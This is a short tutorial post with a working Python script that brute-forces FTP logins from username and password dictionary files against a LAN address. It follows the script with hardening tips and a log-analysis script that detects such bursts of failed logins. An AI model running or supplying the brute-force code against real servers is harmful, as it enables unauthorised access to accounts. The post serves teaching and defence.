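This post covers an implementation of FTP brute forcing. The principle is very simple: using the ftplib module, it reads usernames and passwords from dictionary files and tries each login in turn.
I. Source code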
# -*- coding: utf8 -*-
import ftplib


def crackhandle(host, username, password):
    # Try a single login; return True on success, False on any failure.
    try:
        ftp = ftplib.FTP(host)
        ftp.login(username, password)
        ftp.quit()
        return True
    except Exception:
        print("login fail! username is %s password is %s" % (username, password))
        return False


def crack():
    host = "192.168.1.108"
    # Read the dictionary files and close the handles once they are loaded.
    with open("/root/Desktop/pythonTest/password.txt") as passwordsList:
        passwords = passwordsList.readlines()
    with open("/root/Desktop/pythonTest/username.txt") as usernamesList:
        usernames = usernamesList.readlines()
    switch = False
    for line in usernames:
        username = line.strip()
        for password in passwords:
            password = password.strip()
            recv = crackhandle(host, username, password)
            if recv:
                print("success userName is %s password is %s" % (username, password))
                switch = True
                break
        # Stop at the first valid username/password pair.
        if switch:
            break


crack()
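Run command: python ftpcrack.py
The result is shown below; the brute force succeeded.
II. Improving FTP security
1. Configure failed-login settings in the local security policy;
2. Use SSL encryption;
3. Set user permissions sensibly;
4. Avoid simple usernames and passwords;
5. Enable anonymous access only when needed;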
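
The failed-login control in item 1 can also be checked from the server side. The following is an added example, not code from the original post: it scans FTP login records for the burst of 530 (login failed) replies that the script above produces, and notes when a 230 (login successful) follows. The record layout, the sample lines, the function names and the thresholds are assumptions made for this example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records: date, time, client IP, username, FTP reply code.
# This layout is an assumption for the example, not a real server's log format.
SAMPLE_LOG = """\
2024-01-01 10:00:00 192.168.1.50 admin 530
2024-01-01 10:00:01 192.168.1.50 admin 530
2024-01-01 10:00:02 192.168.1.50 admin 530
2024-01-01 10:00:03 192.168.1.50 root 530
2024-01-01 10:00:04 192.168.1.50 root 530
2024-01-01 10:00:05 192.168.1.50 root 230
2024-01-01 10:05:00 192.168.1.77 alice 530
2024-01-01 10:05:30 192.168.1.77 alice 230
"""

def parse(line):
    date, time, ip, user, code = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return ts, ip, user, int(code)

def detect_bruteforce(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Return {ip: alert} for clients with >= max_failures 530 replies in window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    tried = defaultdict(set)      # ip -> usernames seen in failed logins
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, code = parse(line)
        if code == 530:           # 530 = not logged in (failed attempt)
            failures = recent[ip]
            failures.append(ts)
            tried[ip].add(user)
            while ts - failures[0] > window:   # drop failures older than window
                failures.popleft()
            if len(failures) >= max_failures and ip not in alerts:
                alerts[ip] = {"first_alert": ts, "failures": len(failures),
                              "usernames": tried[ip], "success_after": None}
        elif code == 230 and ip in alerts:     # 230 = login successful
            # A success right after a failure burst means a guessed credential.
            alerts[ip]["success_after"] = user
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

A non-empty `success_after` is the case to escalate: the account named there should have its password reset and its session activity reviewed.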